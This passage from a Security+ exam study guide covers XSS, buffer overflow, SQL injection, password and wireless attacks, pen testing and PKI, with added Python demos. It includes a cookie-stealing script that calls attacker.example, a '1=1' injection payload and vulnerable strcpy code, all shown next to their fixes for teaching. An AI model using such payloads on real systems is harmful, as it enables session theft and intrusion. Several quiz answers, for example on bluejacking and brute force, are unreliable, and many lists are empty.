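As an added example (not code from the book), the Python below renders the comment page from the pseudo-code above twice, once unescaped as the original template does, and once with output encoding, which is the fix; it also includes a small check for the markers the text describes. The stored comment is a constructed stand-in for what an attacker would submit, and the hostname in it is not a real site.

```python
import html
import re

# Added example, not from the book. STORED_COMMENT is constructed; attacker.example is not a real host.
STORED_COMMENT = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"


def render_vulnerable(latest_comment: str) -> str:
    """The original template: the comment is pasted into the page as-is."""
    return "<html>\nLatest comment:\n" + latest_comment + "\n</html>"


def render_escaped(latest_comment: str) -> str:
    """Output encoding: < > & \" ' become entities, so the browser shows text, not a script."""
    return "<html>\nLatest comment:\n" + html.escape(latest_comment, quote=True) + "\n</html>"


# Crude detector for the markers the text mentions: <script> tags, event handlers, javascript: URLs.
XSS_MARKERS = re.compile(r"<\s*script\b|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def looks_like_xss(user_input: str) -> bool:
    """True if the input contains typical script-injection markers (for triage, not as the defence)."""
    return XSS_MARKERS.search(user_input) is not None


if __name__ == "__main__":
    print(render_vulnerable(STORED_COMMENT))   # the browser would run the script
    print(render_escaped(STORED_COMMENT))      # the browser displays the text instead
    print(looks_like_xss(STORED_COMMENT), looks_like_xss("Great post, thanks!"))
```

Escaping on output is the control that actually stops the attack; pattern matching for <script> is useful for spotting an attempt in a log or an exam question, but attackers have many encodings that a blocklist will miss.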


Figure 8: Buffer overflow

In the example here, we set up a buffer with a maximum of 64 characters and then use strcpy to copy a string of data into it. A string of data is used to represent a number of text characters. The problem is that strcpy does not check the size of the destination buffer: it keeps copying until it reaches the end of the source string. If the string of data is 64 characters or longer (leaving no room for the terminating null), a buffer overflow occurs:

#include <string.h>

/* Deliberately vulnerable: strcpy copies until the NUL terminator, so a string of 64 or more characters overflows tmp */
int fun(char data[256]) {
    int i;
    char tmp[64];
    strcpy(tmp, data);  /* no bounds check against the 64-byte destination */
    return 0;
}

Exam tip: strcpy can create a buffer overflow because it does not check the size of the destination buffer.

Hijacking related attacks

In this section, we will look at attacks where the hacker hijacks a device, a cookie, or a piece of software. Let's look at these in turn:

Input validation can prevent SQL injection, buffer overflow, and integer overflow attacks.

A stored procedure can prevent an SQL injection attack because it is a pre-written script stored on the database server; the application passes it parameters and cannot alter the SQL it executes.
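As an added example (not code from the book) serving both this passage and the input validation section of the secure coding chapter, the Python below shows the login query built by string concatenation (vulnerable), the same query with bound parameters (the prepared-statement equivalent of a stored procedure, since SQLite has no stored procedures), and an allowlist check on the username in front of it. The table, its two rows, and the passwords are constructed sample data.

```python
import re
import sqlite3

# Added example, not from the book. The users table and its rows are constructed sample data.


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "s3cret", "user"), ("bob", "hunter2", "admin")])
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    """Attacker input becomes part of the SQL text itself."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username: str, password: str) -> list:
    """Input is bound as data; the database never parses it as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


USERNAME_RE = re.compile(r"[a-z0-9_]{1,32}")   # allowlist: no quotes, spaces or dashes


def login_validated(conn, username: str, password: str) -> list:
    """Input validation in front of the parameterized query: defence in depth."""
    if not USERNAME_RE.fullmatch(username):
        return []
    return login_parameterized(conn, username, password)


if __name__ == "__main__":
    db = make_db()
    payload = "x' OR 1=1--"          # the classic 1=1 payload; -- comments out the password check
    print(login_vulnerable(db, payload, "anything"))     # both users come back: logged in without a password
    print(login_parameterized(db, payload, "anything"))  # [] : no user is literally named x' OR 1=1--
    print(login_validated(db, "alice", "s3cret"))        # [('alice', 'user')]
```

With the vulnerable function the query text becomes WHERE username = 'x' OR 1=1--' AND password = 'anything', so the password clause is commented away and 1=1 is true for every row. Binding the parameters keeps the quote and the comment marker inside the data, which is the same guarantee a stored procedure gives.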

Driver manipulation

Device drivers allow an operating system such as Windows to talk to hardware devices such as printers. Sophisticated attackers may dive deep into the device drivers and manipulate them so that they undermine security on your computer. They could take control of the audio and video of the computer, stop your anti-virus software from running, or expose your data to someone else. There are two main techniques for driver manipulation, and these are as follows:

Cryptographic attacks

There are a variety of cryptographic attacks, and we will now look at these in turn; you need to know these thoroughly for the Security+ exam. We will start with the birthday attack and finish with key stretching:

Password attacks

The two most common password attacks are the dictionary attack and the brute force attack; let's look at these in turn:

Which of the following passwords will a dictionary attack crack?

Of the passwords elasticity, blueberry, el@STcity, and fred123, a dictionary attack will crack elasticity and blueberry, because both are ordinary dictionary words. It will not crack el@STcity, which is not spelled properly and contains a symbol and capitals that are not in a dictionary, and it will not crack fred123, because it ends in numbers; a plain dictionary contains only words. Be aware that real cracking tools add mangling rules that try exactly such variations, so this only holds for a plain word list.

Which of the following passwords will a brute force attack crack?

It will crack them all—eventually.

Account lockout with a low threshold prevents an online brute force attack (an attacker who has stolen a copy of the password hashes can still attack them offline, where no lockout applies).
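As an added example (not code from the book), the Python below runs a dictionary attack and a brute force attack against unsalted SHA-256 hashes of the four candidate passwords from the text, and works through the arithmetic behind the account-lockout tip. The word list is a constructed stand-in for a real dictionary file, and the lockout figures (5 attempts, 30 minutes) are assumptions.

```python
import hashlib
import itertools
import string
from typing import Optional

# Added example, not from the book. WORDLIST is a constructed stand-in for a dictionary file.
WORDLIST = ["password", "letmein", "blueberry", "dragon", "elasticity", "sunshine"]
CANDIDATES = ["elasticity", "blueberry", "el@STcity", "fred123"]
ALNUM = string.ascii_lowercase + string.digits     # 36-character set used for the brute force


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def dictionary_attack(target_hash: str, wordlist) -> Optional[str]:
    """Hash each dictionary word and compare; only exact dictionary words can be found."""
    for word in wordlist:
        if sha256_hex(word) == target_hash:
            return word
    return None


def brute_force(target_hash: str, charset: str, max_len: int) -> Optional[str]:
    """Try every string up to max_len; always succeeds eventually, but the keyspace grows exponentially."""
    for length in range(1, max_len + 1):
        for chars in itertools.product(charset, repeat=length):
            guess = "".join(chars)
            if sha256_hex(guess) == target_hash:
                return guess
    return None


def keyspace(charset_size: int, length: int) -> int:
    """Number of guesses needed to exhaust every password of exactly this length."""
    return charset_size ** length


def online_attack_years(space: int, attempts_before_lockout: int, lockout_minutes: int) -> float:
    """Worst case for an online brute force when account lockout pauses the attacker."""
    minutes = space / attempts_before_lockout * lockout_minutes
    return minutes / (60 * 24 * 365.25)


if __name__ == "__main__":
    for pw in CANDIDATES:
        print(f"{pw:>12}: dictionary -> {dictionary_attack(sha256_hex(pw), WORDLIST)}")
    print("brute force of 'ab1':", brute_force(sha256_hex("ab1"), ALNUM, 3))
    space = keyspace(len(ALNUM), len("fred123"))
    print(f"keyspace for 7 characters of [a-z0-9]: {space:,}")
    print(f"online, 5 tries then 30 min lockout: {online_attack_years(space, 5, 30):,.0f} years")
```

The brute force is only demonstrated on a three-character password because the seven-character keyspace is about 78 billion guesses; an offline attacker with a GPU gets through that quickly, which is why stored passwords need a salted, slow hash as well as a lockout policy.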

Weak, common passwords make it very easy to guess them using a password cracker. Password is the most common password in use. The following list shows the most common passwords over the years:

Wireless attacks

Over the past few years, the use of wireless in our daily lives and in the office has increased to an extent that if I am booking a hotel room and there is no wireless, then I look for another hotel. As you travel on the railways to and from work, the rail company provides complimentary Wi-Fi. Let's look at the types of wireless attacks:


Figure 9: Evil twin

The diagram in Figure 9 helps explain an evil twin wireless access point. The victim has gone to a coffee shop to buy some coffee; the shop provides Wi-Fi free of charge, the SSID is hidden, and the WAP password is printed on the receipt. However, when the customer sits down at the table to connect his tablet, he finds an SSID called CAFÉ; he assumes this is the Wi-Fi he has the details for and clicks to join the network, but instead of asking him for a Wi-Fi password, it is set to open system authentication, so it connects him immediately. He wonders why the Wi-Fi details were printed on the receipt at all, unaware that he has just joined an evil twin network where all of his data will be intercepted by a wireless packet sniffer. The legitimate WAP did not appear in his list because its SSID is hidden.

Implementing an 802.1X managed switch prevents rogue WAPs from accessing your network, as the AP needs to be authenticated before the switch port passes its traffic.

Exam tip: A wireless jamming attack uses radio interference to carry out the attack.

Penetration testing

A penetration test is an intrusive test where a third party has been authorized to carry out an attack on a company's network. The rules of engagement are agreed beforehand, including whether the testers should only identify the weaknesses or exploit them as far as they can go.

Penetration testing is commonly known as a pen test. The pen testers are given different amounts of information:

For example, a pen tester is about to carry out a pen test but has not been given any information on the system. As he arrives at the company, the IT manager offers him a cup of coffee and then gives him the local admin account of Server 1. What type of pen test is this? It is a gray box test, as he has been given some information, even if it is late.

Penetration testing techniques

Let's now look at the type of techniques that a pen tester may adopt:

Listening is passive reconnaissance. Password reset is active reconnaissance.

Vulnerability scanning concepts

A vulnerability scanner is a passive scanner that identifies vulnerabilities or weaknesses on the system. For example, there could be missing updates for the operating system, anti-virus solutions, or there could be only one administrator account on the system. Microsoft has a vulnerability scanning tool called the Microsoft Baseline Security Analyzer (MBSA). A zero day exploit cannot be traced by a vulnerability scanner; it has not yet been identified and has no updates or patches available.

Let's look at the type of output a vulnerability scanner could produce:

A pivot is gaining access to one computer and then using it as a foothold to launch an attack on another computer that could not be reached directly.

Credentialed versus non-credentialed scans

There are two types of scans, credentialed and non-credentialed. Let's look at these in turn:

Exam tip: A credentialed scan can produce more information and can audit the system. A non-credentialed scan is primitive and can only find missing patches or updates.

Penetration testing versus vulnerability scanning

The penetration test is more intrusive, as it tries to fully exploit the vulnerabilities that it finds and could cause damage to the IT systems, whereas the vulnerability scanner is non-intrusive, as it only scans for vulnerabilities. Even the credentialed scan only reads the registry and permissions and finds missing patches; it is informational, does not exploit the system, and is therefore far less likely to cause damage to the systems.

Practical exercise—running a vulnerability scanner

In this exercise, we are going to download the Microsoft Baseline Security Analyzer (MBSA) and run it against your local computer to look for vulnerabilities:

  1. Go to Google, search for Microsoft's Baseline Security Analyzer tool, and download it. You can also just enter MBSA and it will find it.

  2. Click on MBSASetup-x64-EN. The MBSA Setup wizard appears. Press Next:


Figure 10

  3. Click on I accept the license agreement, then press Next:


Figure 11

  4. On the destination folder page, press Next.

  5. On the start installation page, press Install, then the installation progress page will appear:


Figure 12: Installation progress

  6. Then, the setup will finish:


Figure 13: Installation complete

  7. A shortcut is placed on the desktop. Double-click it. The UAC prompt appears; press Yes:


Figure 14: MBSA shortcut

  8. The MBSA management console appears; press Scan a Computer, and then at the bottom right, press Start Scan:


Figure 15: MBSA management console

  9. The scan starts and it downloads security update information from Microsoft. As it is going to compare the computer's updates against the latest updates for Windows 10, this will take about 10-15 minutes:


Figure 16: Obtaining security updates from Microsoft

  10. The scan results page comes up; you will notice that the default sort order is Score (worst first). Scroll down:


Figure 17

  11. You can see that the MBSA is a vulnerability scanner that would be used for a credentialed scan and that it produces some good results, but it is passive and informational, and did not try to exploit the computer at all:


Figure 18: Credentialed vulnerability scan

You will now see whether you have any vulnerabilities on your computer. There are hyperlinks below each item listed, giving you information on how to remediate each vulnerability. Look at each of these in turn and take the appropriate action.

Review questions

  1. If I install a freeware program that analyses my computer and then finds 40,000 exploits and asks me to purchase the full version, what type of attack is this?

  2. What is crypto-malware?

  3. What type of virus replicates itself and uses either port 4444 or 5000?

  4. What type of virus inserts a .dll into either the SysWOW64 or System32 folder?

  5. What is a RAT?

  6. What type of virus attacks the Windows\System32 folder on Windows, or /bin and /usr/bin on Linux?

  7. How does a logic bomb virus work?

  8. What is the purpose of a keylogger?

  9. What is a botnet?

  10. Explain a phishing attack.

  11. How does spear phishing differ from a phishing attack?

  12. What is a whaling attack?

  13. What type of attack is it if I leave a voicemail?

  14. What is social engineering tailgating?

  15. What is social engineering?

  16. What type of attack is it if I dress as a policeman?

  17. What type of attack is it if a fireman arrives and you let him into the server room to put out a fire?

  18. What type of attack is it if I am in an ATM queue and someone holds his phone to one side so that he can film the transaction?

  19. What type of attack is distributing fake software?

  20. What is a watering hole attack?

  21. What type of attack is it if I receive an email from the CEO telling me to complete the form below by clicking on a link in the email?

  22. One of the bosses asks me to give him the same information that one of my peers gave him last week. I am not too sure, but I give him the information; what type of attack is this?

  23. What type of attack is a multiple SYN flood attack on a well-known website that takes it down?

  24. Explain a man-in-the-middle attack.

  25. How does a replay attack differ from a man-in-the-middle attack?

  26. What type of attack is a man-in-the-middle attack using an SSL 3.0 browser that uses Cipher Block Chaining (CBC)?

  27. What type of attack is a man-in-the-browser attack?

  28. How can I prevent a replay attack in a Microsoft environment?

  29. How can I prevent a pass the hash attack?

  30. What type of attack uses HTML tags with JavaScript?

  31. What type of exploit has no patches and cannot be detected by the NIDS or NIPS?

  32. What is domain hijacking?

  33. What is bluejacking?

  34. What is bluesnarfing?

  35. For what type of attack does the attacker need to be local, and how can I prevent that attack?

  36. What type of attack is associated with the strcpy function?

  37. What is an integer overflow attack?

  38. What type of attack uses the phrase 1=1?

  39. Name two methods to prevent the attack in question 36.

  40. What type of attack is session hijacking?

  41. If I misspell a website but still get there, what type of attack is this?

  42. What type of attack would I use shimming or refactoring for?

  43. What type of attack is susceptible to a birthday attack?

  44. What are rainbow tables?

  45. How can I store passwords to prevent a dictionary attack?

  46. Name two tools that can be used for key stretching.

  47. What is the fast password attack that can crack any password?

  48. What is the only way to prevent a brute force attack?

  49. What can we do to slow down a brute force attack?

  50. What type of authentication is the most prone to errors?

  51. What is an evil twin?

  52. How can I prevent an attack by a rogue WAP?

  53. I am trying to use the internet but my wireless session keeps crashing; what type of attack is this?

  54. How close does an attacker need to be for an NFC attack?

  55. If I have no information on the system but at the last minute the IT manager gives me the local admin account, what type of penetration test is this?

  56. How much information does a black box pen tester have?

  57. How much information does a white box pen tester have?

  58. Which type of vulnerability scan can I use for auditing?

  59. If I carry out a non-credentialed vulnerability scan, what will I find?

  60. What type of reconnaissance is it if I try to obtain a password reset?

  61. What type of reconnaissance is it if I actively listen?

  62. What is a pivot?

Answers and explanations

  1. Because you have parted with money, this is a subtle form of ransomware.

  2. An example of crypto-malware is ransomware where the victim's hard drive is encrypted and held to ransom.

  3. A worm replicates itself and can use either ports 4444 or 5000.

  4. A Trojan inserts a .dll into either the SysWOW64 or System 32 folder.

  5. A remote access Trojan is a Trojan that sends the user's username and password to an external source so that they can create a remote session.

  6. A rootkit virus attacks the root in windows it is the /system 32 folder or in Linux it is the /usr/bin/ directory.

  7. A logic bomb virus is triggered off by an event; for example, the Fourth of July logic bomb would activate when the date on the computer was July 4.

  8. A keylogger is a piece of software that could run from a USB flash drive plugged into the back of a computer; it then records all of the keystrokes being used. It can capture sensitive data that is being typed in, such as bank account details and passwords.

  9. A botnet is a group of computers that have been infected so that they can be used to carry out malicious acts without the real attacker being identified. They could be used for a DDoS attack.

  10. A phishing attack is when a user receives an email asking him to fill in a form requesting his bank details.

  11. Spear phishing is a phishing attack that has been sent to a group of users.

  12. A whaling attack targets the CEO or a high-level executive in a company.

  13. A vishing attack can use a telephone or leave a voicemail.

  14. Social engineering tailgating is where someone has used a smart card or entered a PIN to access a door, and then someone behind them enters through the door before it closes without entering any credentials.

  15. Social engineering exploits an individual's character in a situation that they are not used to.

  16. If I dress as a policeman it could be an impersonation attack.

  17. If I let a fireman into the server room to put out a fire, that is a social engineering urgency attack.

  18. If I am in an ATM queue and someone films the transaction, this is a subtle shoulder surfing attack.

  19. Fake software that will not install is a hoax. An email alert telling you to delete a system file as it is a virus is also a hoax.

  1. A watering hole attack infects a website that a certain group of people visit regularly.

  2. An email that looks like it has come from the CEO telling you to carry out an action is a social engineering authority attack.

  3. This is a social engineering consensus attack where the person being attacked wants to be accepted by their peers.

  4. An attack with multiple SYN flood attacks is a DDoS attack.

  5. A man-in-the-middle attack is where a connection between hosts has been intercepted, replaying and changing the conversation, but the people still believe that they are talking directly to each other.

  6. A replay attack is similar to a man-in-the-middle attack, except that the intercepted packet is replayed at a later date.

  7. A POODLE attack is a man-in-the-middle attack using an SSL 3.0 browser that uses Cipher Block Chaining (CBC).

  8. A man-in-the-browser attack is a Trojan that intercepts your session between your browser and the internet; it aims at obtaining financial transactions.

  9. Kerberos authentication uses USN and time stamps and can prevent a replay attack, as the USN packets need to be sequential and the time stamps need to be in order.

  10. Disabling NTLM will prevent a pass the hash attack.

  11. XSS uses HTML tags with JavaScript.

  12. A zero day virus has no patches and cannot be detected by the NIDS or NIPS as it may take the anti-virus vendor up to five days to release a patch.

  13. Domain hijacking is where someone tries to register your domain, access your hosted control panel, and set up a website that is similar to yours.

  14. Bluejacking is hijacking someone's Bluetooth phone so that you can take control of it and send text messages.

  15. Bluesnarfing is where you steal someone's contacts from their Bluetooth phone.

  16. An ARP attack is a local attack that can be prevented by using IPSec.

  17. strcpy can be used for a buffer overflow attack.

  18. An integer overflow inserts a number larger than what is allowed.

  19. An attack that uses the phrase 1=1 is an SQL injection attack.

  20. Input Validation and Stored Procedures can prevent an SQL injection attack.

  21. Session hijacking is where your cookies are stolen so someone can pretend to be you.

  22. Typosquatting is where an attacker launches a website with a similar name to the legitimate website in the hope that victims misspell the URL.

  1. Shimming or refactoring are used for a driver manipulation attack.

  2. Digital signatures are susceptible to a birthday attack.

  3. Rainbow tables are a pre-computed list of passwords with the relevant hash in either MD5 or SHA1.

  4. If I salt passwords, a random value is inserted into each one, which prevents dictionary attacks as a dictionary does not contain random characters.

  5. Two tools that can be used for key stretching are bcrypt and PBKDF2.

  6. Brute force is the fastest password attack and can crack any password, as it tries all combinations of characters, letters, and symbols.

  7. Account lockout with a low threshold value is the only way to prevent a brute force attack.

  8. If account lockout is not available, the best way to slow down a brute force attack is to make the password length longer or to salt the passwords.

  9. Using passwords for authentication is the most prone to errors, as certificates and smart cards don't tend to have many errors.

  10. An evil twin is a WAP that is made to look like a legitimate WAP.

  11. Using an 802.1x authentication switch can prevent an attack by a rogue WAP as the device needs to authenticate itself to attach to the switch.

  12. A wireless disassociation attack is where the attacker prevents the victim from connecting to the WAP.

  13. An attacker needs to be within 4 cm of my card to launch an NFC attack.

  14. This is a gray box pen test; although it says he has no information, which would make it black box, at the last minute he is given a password, making it gray box, as he has been given some information.

  15. A black box pen tester has no information.

  16. A white box pen tester has all of the information.

  17. A credentialed vulnerability scan can be used for auditing.

  18. A non-credentialed vulnerability scan can only see missing patches on the systems on your network.

  19. Active reconnaissance is where I try to obtain a password reset.

  20. Listening is a passive reconnaissance technique; active listening means that you are concentrating on what is being said, and you are not taking any action.

  21. A pivot is where you gain access to a network so that you can launch an attack on a secondary system.

Implementing Public Key Infrastructure

Certificates are used for both encryption and authentication, and in this chapter, we are going to look at different encryption types and how certificates are issued and used. This is the most difficult module for students to understand, so we have focused on making the most difficult aspects seem easy. If you are going to be successful in the Security+ exam, you must know this module thoroughly. We will start with the Public Key Infrastructure (PKI), both the public and private keys. It is an asymmetric form of encryption.

We will cover the following exam objectives in this chapter:

Public key infrastructure concepts

The public key infrastructure provides asymmetric techniques using two keys: a public key and a private key. There is a certificate hierarchy, which is called the certificate authority, that manages, signs, issues, validates, and revokes certificates. Let's first look at the components of the certificate hierarchy. A certificate is known as an X509 certificate.

Certificate hierarchy

The Certificate Authority (CA) is the ultimate authority, as it holds the master key, also known as the root key, which it uses to sign all of the certificates that it gives to the intermediary, which in turn issues them to the requester:


Figure 1: Certificate hierarchy

Exam tip:
For Business-to-Business (B2B) transactions and working with other commercial companies, your X509 certificates need to come from a public CA.

There are different types of CA:

If you wish to trade and exchange certificates with other businesses, you need to get your certificate from a public CA. The certificate that follows has been issued to the Bank of Scotland by a public CA called DigiCert Global CA; you can see on the front of the certificate the purpose for use and also the dates that it is valid for. The X509 has an Object Identifier (OID) that is basically the certificate's serial number, in the same way that paper money has serial numbers:


Figure 2: Public CA issued certificate

Exam tip:
Certificate pinning prevents CA compromise and the issuing of fraudulent certificates.

Certificate trust

Certificates have some form of trust where the certificate can check whether or not it is valid. We are going to look at different trust models; you need to ensure that you know when each is used:

Exam tip:
When two separate CAs trust each other, they will use a trust model called the bridge of trust.

Exam tip:
A bridge trust model is used so that two separate CAs can work with each other.

Certificate validity

Each time a certificate is used, the first thing that must happen is that it is checked for validity; there are three separate processes that you must know thoroughly, and these are as follows:


Figure 3: Certificate validity

The validation of a certificate is done by the CRL unless it is going slow—then it will be the OCSP doing this.

Certificate management concepts

We are now going to look at the different ways certificates are managed in a PKI environment, starting with the request for a new certificate and ending with different certificate formats. You must learn all of this information thoroughly as these aspects are heavily tested:


Figure 4: Key escrow

The key escrow stores private keys for third parties.

A web server will use certificate stapling to bypass the CRL and use the OCSP for faster certificate validity. This is also known as OCSP stapling.

Certificate type    Format               File extension
Private             P12                  .pfx
Public              P7B                  .cer
PEM                 Base 64 format       .pem
DER                 Extension for PEM    .der

The certificate equivalent of a serial number is the OID that is located on the X509 itself.
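The relationship between the PEM and DER rows of the table above, as an added Python example that is not from the book: DER is the binary encoding, and PEM is the same bytes Base64-encoded between BEGIN and END lines. The sample object is a constructed five-byte DER SEQUENCE standing in for a certificate (a real X509 certificate is also an outer SEQUENCE, tag 0x30, just far longer); it is not a real certificate, and the function and constant names are this example's own.

```python
import base64
import re

# Constructed stand-in for a DER object: SEQUENCE (tag 0x30, length 3) containing
# INTEGER 5 (tag 0x02, length 1, value 0x05). A real X509 certificate is also an
# outer SEQUENCE, just thousands of bytes long.
SAMPLE_DER = bytes.fromhex("3003020105")

# The same five bytes in PEM form: Base64 text between BEGIN/END lines.
SAMPLE_PEM = (
    "-----BEGIN CERTIFICATE-----\n"
    "MAMCAQU=\n"
    "-----END CERTIFICATE-----\n"
)


def pem_to_der(pem: str, label: str = "CERTIFICATE") -> bytes:
    """Strip the BEGIN/END armour and Base64-decode the body back to DER bytes."""
    match = re.search(rf"-----BEGIN {label}-----(.*?)-----END {label}-----", pem, re.S)
    if match is None:
        raise ValueError(f"no PEM block labelled {label}")
    body = "".join(match.group(1).split())      # drop the 64-column line breaks
    return base64.b64decode(body, validate=True)


def der_to_pem(der: bytes, label: str = "CERTIFICATE") -> str:
    """Base64-encode DER bytes and wrap them in 64-character lines with armour."""
    b64 = base64.b64encode(der).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return f"-----BEGIN {label}-----\n" + "\n".join(lines) + f"\n-----END {label}-----\n"


def der_outer_element(der: bytes) -> tuple:
    """Read the outermost DER tag and length (short and long length forms)."""
    tag, first = der[0], der[1]
    if first < 0x80:                              # short form: length fits in 7 bits
        return tag, first
    count = first & 0x7F                          # long form: next `count` bytes hold the length
    return tag, int.from_bytes(der[2:2 + count], "big")


if __name__ == "__main__":
    print(pem_to_der(SAMPLE_PEM).hex())           # 3003020105
    print(der_outer_element(SAMPLE_DER))          # (48, 3): tag 0x30 is SEQUENCE
    print(der_to_pem(SAMPLE_DER), end="")
```

The same conversion is what tools do when they rename a .pem to .der or back: no cryptographic content changes, only the text wrapping around the bytes.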

Certificate types

As a security professional, you will be responsible for purchasing new certificates, and therefore you must learn the certificate types thoroughly to ensure that you make the correct purchase. We will start with the self-signed certificate that can roll out with applications like Exchange Server or the Skype server and finish with extended validation, where the certificate has a higher level of trust:

PEM uses a Base64 certificate.

A wildcard certificate can be used on several servers in the same domain. A SAN certificate can be used on servers in different domains.


Figure 5: Extended validation

Asymmetric and symmetric encryption

There are two main types of encryption that use certificates, asymmetric and symmetric, and we need to learn about each thoroughly. Let us start by explaining what encryption is; please remember that you are taking plaintext and changing it into ciphertext.

Encryption explained

Encryption is where we take plaintext that can be easily read and convert it into ciphertext that cannot be read. For example, if we take the word pass in plain text, it may then be converted to UDVV; this way, it is difficult to understand:

Letter   A  B  C  D  E  F  G  H  I  J  K  L  M
ROT 13   N  O  P  Q  R  S  T  U  V  W  X  Y  Z

Letter   N  O  P  Q  R  S  T  U  V  W  X  Y  Z
ROT 13   A  B  C  D  E  F  G  H  I  J  K  L  M

When receiving the message—GVZR SBE GRN—then we would apply the ROT 13, but instead of going forward 13 places to decipher we would simply go back 13 places and the message would now be TIME FOR TEA.
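The ROT 13 table and the TIME FOR TEA message, as an added Python example that is not code from the book: a general Caesar shift in which ROT 13 is the shift of 13, going back 13 places is the shift of -13, and listing all 26 possible shifts shows why a shift cipher hides text but provides no real secrecy. The function names are this example's own.

```python
import string

ALPHABET = string.ascii_uppercase  # 26 letters, so shifts wrap around modulo 26


def caesar(text: str, shift: int) -> str:
    """Shift every letter by `shift` places (a negative shift goes backwards).

    Non-letters (spaces, punctuation, digits) pass through unchanged and case
    is preserved, so the same function both encrypts and decrypts.
    """
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % len(ALPHABET) + base))
        else:
            out.append(ch)
    return "".join(out)


def rot13(text: str) -> str:
    """ROT 13 is the Caesar shift of 13; applying it twice returns the input,
    because +13 and -13 are the same move modulo 26."""
    return caesar(text, 13)


def all_shifts(ciphertext: str) -> list:
    """Every possible Caesar decryption. Only 26 keys exist, so the plaintext is
    always somewhere in this list: a shift cipher obscures, it does not protect."""
    return [caesar(ciphertext, -k) for k in range(len(ALPHABET))]


if __name__ == "__main__":
    secret = rot13("TIME FOR TEA")
    print(secret)                                     # GVZR SBE GRN
    print(caesar(secret, -13))                        # TIME FOR TEA (go back 13 places)
    print(rot13(secret))                              # TIME FOR TEA as well
    print(all_shifts(secret).index("TIME FOR TEA"))   # 13
```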

Exam tip:
Encryption is taking plaintext and changing it into ciphertext so that it cannot be read.

There are two types of encryption that use certificates and these are asymmetric and symmetric; let us look at each of these in turn:

The first stage in encryption is the key exchange; you will always keep your private key and give away your Public Key. You will always use someone else's public key to encrypt:


Figure 6: Asymmetric key exchange

In the preceding diagram, there are two different key pairs: the black key pair and the white key pair. These work together. If you think of the private key as being your bank card, you will never give it away, but the Public Key is your deposit slip—you will give it away so that people can pay money into your account.

The person who is sending the data is on the From side and the person receiving the data is on the To side.

The way to remember the labels is: the left-hand side is South-East and the right-hand side is distinguished visitor. These labels stand for:

For example, Bob wants to encrypt data and send it to Carol; how is this done? Let us look at the following diagram. We can see that Bob owns the black key pair and Carol owns the white key pair. The first thing that needs to happen before encryption can happen is that they give the other person their public key:


Figure 7: Bob encrypting data

You can see under the column for Bob that he has his private key, which he will always keep, and the public key that Carol has given him. In the preceding diagram, you can see the label E for encryption, and therefore Bob uses Carol's public key to encrypt the data. Then, under Carol, you can see the letter D for decryption; therefore, when the encrypted data arrives, Carol uses the other half of the white key pair, the private key, to decrypt the data.

Exam tip:
Encryption stops the data being read by changing plaintext to ciphertext. A digital signature ensures that the data has not been altered as it creates a hash of the message, but the original data can be read.

Digital signature explained

When we send an email or document to someone, it could be intercepted in transit and altered. Your email address could be spoofed and someone could send an email as if it was from you, so there is no guarantee of integrity. Remember from Chapter 1, Understanding Security Fundamentals, that we used hashing to provide the integrity of data; in emails, however, we use a digital signature. We sign the email or document with our private key and it is validated by our public key.

The first stage in digital signatures is to exchange public keys—the same principle as encryption.

For example, George wants to send Mary an email and he wants to ensure that it has not been altered in transit. See the following diagram:


Figure 8: Digital signature

In the preceding diagram, you can see that George is going to sign the email with his private key when he sends it to Mary; she validates it with the Public Key that George has already given to her. When the email has been validated, she knows that the email has not been tampered with.

When people are asked to sign contracts, they sometimes use a third-party provider that asks them to digitally sign the contract; this then makes the contract valid as the digital signature proves the identity of the signatory.

Non-repudiation: When I complete a digital signature, I am using my private key, which I should never give away, to sign the email or document, proving that it has come from me. Non-repudiation means that I cannot deny that it was me who signed the document; I could not say it was done by someone else. In the early sixth century, King Arthur would send messages to his knights on a parchment scroll and then put his wax seal on the scroll to prove it came from him. The digital signature in modern life does the same: it proves who it came from. The digital signature creates a one-way hash of the entire document, so it also provides integrity, similar to hashing.
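Bob encrypting to Carol with her public key (Figure 7) and George signing for Mary with his private key (Figure 8), side by side, as an added Python example that is not code from the book. It uses textbook RSA built from three Mersenne primes chosen here only to keep the arithmetic visible: no padding, and key sizes far below the minimums the chapter discusses later. Everything in the block, including the names of the functions and the sample messages, is this example's own.

```python
import hashlib
from math import gcd

# Constructed toy primes (Mersenne primes M31, M61, M89). A real key pair uses
# primes of ~1,000+ bits each; these only make the arithmetic visible.
M31 = 2**31 - 1
M61 = 2**61 - 1
M89 = 2**89 - 1
PUBLIC_EXPONENT = 65537


def make_keypair(p: int, q: int, e: int = PUBLIC_EXPONENT) -> tuple:
    """Return (public_key, private_key) as (n, e) and (n, d)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)                      # modular inverse (Python 3.8+)
    return (n, e), (n, d)


def encrypt(public_key: tuple, message: bytes) -> int:
    """Encrypt with the RECIPIENT's public key: Bob uses Carol's public key."""
    n, e = public_key
    m = int.from_bytes(message, "big")
    if m >= n:
        raise ValueError("message too long for this toy modulus")
    return pow(m, e, n)


def decrypt(private_key: tuple, ciphertext: int, length: int) -> bytes:
    """Decrypt with the recipient's own private key, the other half of the pair."""
    n, d = private_key
    return pow(ciphertext, d, n).to_bytes(length, "big")


def _hash_to_int(message: bytes, n: int) -> int:
    # A real scheme pads the hash; the toy just reduces SHA-256 modulo n.
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(private_key: tuple, message: bytes) -> int:
    """Sign with the SENDER's private key: George signs with his own key."""
    n, d = private_key
    return pow(_hash_to_int(message, n), d, n)


def verify(public_key: tuple, message: bytes, signature: int) -> bool:
    """Verify with the sender's public key; the message itself stays readable."""
    n, e = public_key
    return pow(signature, e, n) == _hash_to_int(message, n)


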